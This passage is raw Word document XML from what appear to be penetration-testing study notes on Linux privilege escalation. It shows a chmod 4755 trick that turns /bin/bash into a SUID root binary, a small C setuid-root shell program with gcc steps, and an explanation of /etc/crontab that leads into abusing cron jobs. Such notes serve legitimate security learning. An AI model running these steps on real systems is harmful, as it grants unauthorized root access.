        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-C .157</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002423">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="986"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, find the path to chmod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002424">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="98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which chmod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002425">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="986"/>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echo "/usr/bin/chmod 4755 /bin/bash" &gt; shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002426">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="986"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That command itself sets the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> bit (4) and normal rwxr-xr-x (755) permissions on /bin/bash.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="986"/>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4755</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → owner can read/write/execute, group/others can read/execute, and the file runs with the owner’s (root’s) privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002428">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="986"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So /bin/bash would become a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> root binary, meaning any user who runs /bin/bash gets a root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002429">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="986"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So once we get shell.sh to execute, we can run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/bash -p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000242A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000242B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000242C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000242D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom script to open shell as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000242E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put the following in a C file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000242F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002430">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setuid(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002431">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("/bin/bash -p");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002432">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002433">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002434">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1131"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -o &lt;name&gt; &lt;filename.c&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002435">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then get a process to execute it, giving you a root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002436">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002437">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002438">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002439">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use this website to read Cron Tab Schedule Expression</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000243A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1479"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId754">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://crontab.guru/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000243B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000243C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000243D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v4cii6z5dwko" w:id="320"/>
      <w:bookmarkEnd w:id="320"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Understanding structure of /etc/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000243E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000243F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3048000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="15" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId755"/>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2440">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId756">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sar</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see 5 cron jobs here (the first 4 of which are standard)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002442">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1218"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These 4 manually execute cron jobs at their specified intervals</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002443">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means: as root, change directory to / and run all executable scripts in /etc/cron.hourly (via run-parts).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002444">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The test -x /usr/sbin/anacron || ... pattern</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002445">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1218"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test -x /usr/sbin/anacron checks if anacron exists and is executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002446">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1218"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">|| means "if the previous command fails".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002447">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1218"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, if anacron is not found, then it manually runs the corresponding /etc/cron.daily, /etc/cron.weekly, or /etc/cron.monthly scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002448">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1218"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Anacron does the job of running cron jobs. If it doesn't work, then it will run the stuff on the right, which manually executes cron jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002449">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1218"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The leftmost column tells us how often the cron job is run. The thing I underlined in red is called a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">crontab schedule expression</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. It's a language. You can use this website to translate it to English. Just copy and paste it into the website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000244A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1218"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId757">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://crontab.guru/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000244B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000244C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000244D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000244E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_up0qj8tdhfhl" w:id="321"/>
      <w:bookmarkEnd w:id="321"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Abusing cron jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000244F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX 18.3.1. Abusing Cron Jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002450">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002451">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002452">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
